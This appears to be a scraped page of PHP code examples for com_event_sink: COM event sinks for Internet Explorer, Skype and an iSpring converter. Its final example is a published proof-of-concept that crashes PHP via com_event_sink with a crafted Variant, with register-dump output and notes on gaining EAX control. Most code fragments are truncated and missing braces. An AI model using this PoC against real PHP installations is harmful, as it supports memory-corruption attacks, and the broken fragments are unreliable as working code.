Exemple #1

class IEEventSinker
    var $terminated = false;
    function ProgressChange($progress, $progressmax)
        echo "Download progress: {$progress} / {$progressmax}\n";
    function DocumentComplete(&$dom, $url)
        echo "Document {$url} complete\n";
    function OnQuit()
        echo "Quit!\n";
        $this->terminated = true;
$ie = new COM("InternetExplorer.Application");
$sink = new IEEventSinker();
com_event_sink($ie, $sink, "DWebBrowserEvents2");
$ie->Visible = true;
while (!$sink->terminated) {
$ie = null;
Exemple #2
 public function initSkypeConnection()
     if (!extension_loaded('com_dotnet')) {
         throw new \Exception('No COM extension loaded. Exiting.');
     $this->com = new \COM("Skype4COM.Skype");
     com_event_sink($this->com, $this, 'ISkype');
     if (!$this->com->client()->isRunning()) {
     $this->com->Attach(5, false);
include '../../../_logger.php';
function ispringconversion_handler($file_path, $file_name)
    logit("iSPringHandler.php", "Welcome To iSpring");
    $file_path = str_replace('../../', "", $file_path);
    $swffile_folder = realpath(".././" . $file_path) . '\\_isp__' . $file_name;
    logit("iSPringHandler.php", "File Path is" . $file_path);
    logit("iSPringHandler.php", "File Name is " . $file_name);
    logit("iSPringHandler.php", "SWF Folder Path  is " . $swffile_folder);
    $swf_file = $file_name . '.swf';
    try {
        $isprComobj = new COM("iSpring.PresentationConverter");
        logit("iSPringHandler.php", "SWFFF COM");
        $listener =& new CEventListener($file_name, realpath(".././" . $file_path));
        com_event_sink($isprComobj, $listener, "_iSpringEvents");
    } catch (Exception $e) {
        echo $e;
    //echo "Opening presentation\n";
    $isprComobj->Settings->Navigation->KeyboardEnabled = false;
    $isprComobj->Settings->Navigation->AdvanceOnMouseClick = false;
    try {
        $isprComobj->OpenPresentation(realpath(".././" . $file_path . "/@@-OriginalDocs-@@/" . $file_name));
    } catch (Exception $e) {
        echo $e;
    try {
        //$isprComobj->Presentation->Slides->SaveThumbnails($thum_folder ."/".$file_name.'_files',"thumbnail_",2,140,140,90);
    } catch (Exception $e) {
        //echo $e;
    try {
        $isprComobj->GenerateFlash($swffile_folder, $swf_file, 0, "");
    } catch (Exception $e) {
        echo $e;
Exemple #4
Define('DEVIDER', 'и');

$last_day = date('d-M-y');
$last_minute = date('H:i');

// Create skype object
$skype = new COM("Skype4COM.Skype");

// Create sink object
$sink = new _ISkypeEvents($com);

// Connect to sink
com_event_sink($skype, $sink, "_ISkypeEvents");

// Start minimized and without splash screen
if (!$skype->client()->isRunning()) {
  $skype->client()->start(true, true);

//Attach to Skype
//process messages to catch the attachment


	it, but lets start from the beginning. 
	As we can read in PHP manual : com_event_sink function connects events from 
	COM object to a PHP object. First argument should be a COM object. But when
	I set it up to new Variant(), PHP instance crashed. 
	After few minutes of research it was clear to me that we can control EAX 
	register by defining first parameter of our Variant object.
	The proof of concept code located below should produce situation similar to
	this :
	eax=024e0050 ebx=010328f0 ecx=41414141 edx=00c0facc esi=0121ff68 edi=00000000
	eip=100f33d5 esp=00c0faa8 ebp=00000000 iopl=0         nv up ei pl nz na po nc
	cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
	100f33d4 50              push    eax
	100f33d5 8b01            mov     eax,dword ptr [ecx]  ds:0023:41414141=????????
	100f33d7 ffd0            call    eax
	IMHO it is possible to write a reliable exploit using i.e.: ROP method but due 
	to lack of free time and skill I leave this task to someone else. Also 0in tried 
	to write stable exploit for same bug in com_print_typeinfo() function but as far 
	as I know it isn't stable enough :( 
Greetz: cxib, 0in, and others ;> 
$EAX = 0x24e0050;
// stack starts at 0x024E0050 (in my case)
$stack = str_repeat("x41", 0x1000000);
// putting some garbage on the stack so the ECX would be 41414141
class foo
com_event_sink(new Variant($EAX), new foo(), array());